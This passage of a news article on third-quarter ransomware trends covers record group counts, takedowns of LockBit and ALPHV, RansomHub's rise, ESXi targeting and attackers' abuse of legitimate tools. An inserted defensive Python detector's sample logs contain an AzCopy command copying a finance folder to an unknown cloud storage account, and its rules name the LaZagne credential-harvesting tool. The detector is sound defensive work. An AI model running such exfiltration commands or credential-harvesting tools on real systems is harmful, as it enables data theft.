This year saw the largest number of active ransomware groups ever recorded, with 58 groups attacking global businesses in the second quarter. Threat intelligence platform provider Cyberint reported only a slight decline in the third quarter, with 57 active groups.
Furthermore, in the third quarter, the top 10 ransomware groups were responsible for only 58.3% of all detected attacks. This reflects both the rise in the number of active groups in general and a decline in activity from larger players due to successful law enforcement takedown operations, such as those against ALPHV and Dispossessor.
Adi Bleih, security researcher at Cyberint, told TechRepublic in an email: “The number of active ransomware groups reaching an all-time high means that companies face a greater risk of attacks, as each of these competing gangs must now compete for targets. Competition between different ransomware groups has fueled increasingly frequent attacks, leaving very little margin for error on the part of corporate cybersecurity teams.
“While security gaps and vulnerabilities may have previously gone unnoticed, the proliferation of ransomware groups scouring the web for their next victims means that even minor mistakes can now quickly lead to major security incidents.”
The most prolific ransomware groups are succumbing to law enforcement operations
In fact, separate research from WithSecure found that of the 67 ransomware groups tracked in 2023, 31 were no longer operational as of the second quarter of 2024. NCC Group also noted a year-over-year decline in ransomware attacks in both June and July this year, which experts linked to the LockBit outage.
WATCH: LockBit comes back online as ransomware gang continues to clash with law enforcement
LockBit in particular had been responsible for the majority of attacks, but with just 85 attacks in the third quarter it hit almost 60% fewer companies than in the second quarter, according to the Cyberint report. This marks the group’s lowest number of quarterly attacks in a year and a half.
An August report from Malwarebytes also found that over the past year, the proportion of ransomware attacks claimed by LockBit has dropped from 26% to 20%, despite more individual attacks being carried out.
ALPHV, the second most prolific ransomware group, also left a vacuum after a sloppily executed cyberattack against Change Healthcare in February. The group did not pay an affiliate its share of the $22 million ransom, so the affiliate exposed them, prompting ALPHV to fake a law enforcement takeover and cease operations.
SEE: Timeline: 15 Noteworthy Cyber Attacks and Data Breaches
These observations suggest that law enforcement actions are proving effective against more established gangs, while opening up new opportunities for smaller groups. Malwarebytes analysts added that the new gangs “will certainly seek to attract their affiliates and supplant them as the dominant forces in ransomware.”
But analysts at Cyberint are optimistic about the ripple effect of takedown operations on smaller players, writing: “As these large operations struggle, it is only a matter of time before other ransomware groups, large and small, follow the same path. The ongoing crackdown has created a more hostile environment for these groups, signaling that their dominance may not last long.”
In fact, instead of continuing the upward trend from the second quarter, when the number of ransomware attacks increased by almost 21.5%, Cyberint researchers found that the 1,209 cases in the third quarter actually marked a decline of 5.5%.
SEE: Global cyber attacks will double from 2020 to 2024, report finds
The quarter’s top ransomware group was RansomHub, responsible for 16.1% of all cases and claiming 195 new victims. The most notable attacks include those against global manufacturer Kawasaki and oil and gas services company Halliburton. Cyberint analysts say the group’s roots are likely in Russia and that it has links to former affiliates of the now-inactive ALPHV group.
In second place on the list of the most active ransomware groups is Play, which claimed 89 victims and 7.9% of all cases. It has allegedly carried out over 560 successful attacks since June 2022, the biggest of which was this year’s campaign aimed at VMware ESXi environments.
“If left unhindered, Play will surpass its annual death toll record in 2024 (301),” the analysts wrote.
Ransomware groups targeting Linux and VMware ESXi systems
The Cyberint report noted a trend of ransomware groups focusing heavily on Linux-based systems and VMware ESXi servers.
VMware ESXi is a bare-metal hypervisor that enables the creation and management of virtual machines directly on server hardware, which can include critical servers. Compromising the hypervisor can allow attackers to disable multiple virtual machines at once and remove recovery options such as snapshots or backups, resulting in a significant impact on a company’s operations.
Ransomware groups Play and Cicada3301 have developed ransomware that specifically targets VMware ESXi servers, while Black Basta has exploited vulnerabilities that allow it to encrypt all files belonging to VMs.
WATCH: Black Basta ransomware has affected more than 500 organizations worldwide
Linux systems also often host virtual machines and other critical enterprise infrastructure. This attention highlights cyber attackers’ interest in the huge gains to be had from inflicting maximum damage on corporate networks.
Attackers use custom malware and exploit legitimate tools
The sophistication of ransomware groups’ techniques has increased significantly over the past year, with Cyberint researchers observing attackers using custom malware to bypass security tools. For example, the Black Basta gang used a number of custom tools after gaining initial access to target environments.
Attackers also exploit legitimate security and cloud storage tools to evade detection. RansomHub was observed using Kaspersky’s TDSSKiller rootkit remover to disable endpoint detection and response, and the LaZagne password recovery tool to harvest credentials. Furthermore, multiple groups used Microsoft’s Azure Storage Explorer and AzCopy tools to steal corporate data and store it in cloud-based infrastructure.
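As an added example (not from the Cyberint report or TechRepublic), the following Python runs over constructed process-creation log lines and flags the legitimate-tool abuse described above: TDSSKiller, LaZagne, AzCopy and Azure Storage Explorer. The log format, host names and the approved storage account list are assumptions; the AzCopy rule only fires when the destination storage account is not on that list.

```python
import re
from typing import Dict, List, Optional

# Constructed sample process-creation events (not real telemetry). Fields:
# timestamp | host | parent image | image | command line
SAMPLE_EVENTS = r"""
2024-09-12T03:14:07Z | srv-fin-01 | C:\Windows\explorer.exe | C:\Windows\System32\notepad.exe | notepad.exe report.txt
2024-09-12T03:15:22Z | srv-fin-01 | C:\Windows\System32\cmd.exe | C:\Users\Public\tdsskiller.exe | tdsskiller.exe
2024-09-12T03:16:40Z | srv-fin-01 | C:\Windows\System32\cmd.exe | C:\Users\Public\laZagne.exe | laZagne.exe all
2024-09-12T03:20:05Z | srv-fin-01 | C:\Windows\System32\cmd.exe | C:\Tools\azcopy.exe | azcopy copy D:\Finance https://unknownacct.blob.core.windows.net/dump --recursive
2024-09-12T04:00:00Z | bkp-01 | C:\Windows\System32\svchost.exe | C:\Program Files\azcopy\azcopy.exe | azcopy copy E:\Backups https://corpbackups.blob.core.windows.net/nightly --recursive
2024-09-12T08:00:00Z | ws-it-07 | C:\Windows\explorer.exe | C:\Program Files\Microsoft Azure Storage Explorer\StorageExplorer.exe | StorageExplorer.exe
"""

# Storage accounts this (constructed) organisation legitimately copies data to.
APPROVED_STORAGE_ACCOUNTS = {"corpbackups"}
BLOB_URL = re.compile(r"https://([a-z0-9]+)\.blob\.core\.windows\.net", re.I)

def classify(image: str, cmdline: str) -> Optional[Dict[str, str]]:
    """Match one event against the tool-abuse rules; None means no finding."""
    exe = image.rsplit("\\", 1)[-1].lower()
    if exe == "tdsskiller.exe":
        return {"rule": "edr_tamper_tool", "severity": "high",
                "note": "legitimate rootkit remover; check whether security services were stopped"}
    if exe.startswith("lazagne"):
        return {"rule": "credential_harvester", "severity": "high",
                "note": "LaZagne has no legitimate use on a production host"}
    if exe == "azcopy.exe" and " copy " in f" {cmdline} ":
        match = BLOB_URL.search(cmdline)
        account = match.group(1).lower() if match else None
        if account not in APPROVED_STORAGE_ACCOUNTS:
            return {"rule": "unapproved_cloud_copy", "severity": "high",
                    "note": f"AzCopy to storage account {account!r} not on the approved list"}
    if exe == "storageexplorer.exe":
        return {"rule": "cloud_storage_tool", "severity": "medium",
                "note": "Azure Storage Explorer; confirm the user is expected to have it"}
    return None

def analyze(events_text: str) -> List[Dict[str, str]]:
    """Run every event through classify() and return the findings in log order."""
    findings = []
    for line in events_text.strip().splitlines():
        ts, host, parent, image, cmdline = [f.strip() for f in line.split(" | ", 4)]
        hit = classify(image, cmdline)
        if hit:
            findings.append({"time": ts, "host": host, "parent": parent, **hit})
    return findings
```

Running `analyze(SAMPLE_EVENTS)` yields four findings on the constructed data; the nightly AzCopy job to the approved account is left alone.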
Bleih told TechRepublic: “As these gangs become more successful and well-funded, they become increasingly sophisticated and operate similarly to a legitimate business. While we often see the same tried and tested attack vectors used – phishing attacks, use of stolen credentials, exploiting vulnerabilities on assets exposed to the internet – they are becoming more creative in how they execute these common techniques.
“They are also becoming increasingly agile and scalable. For example, while threat actors have always been technically savvy, they are now able to begin exploiting new vulnerabilities at scale within days of a critical CVE being documented. In the past, this might have taken weeks or perhaps longer.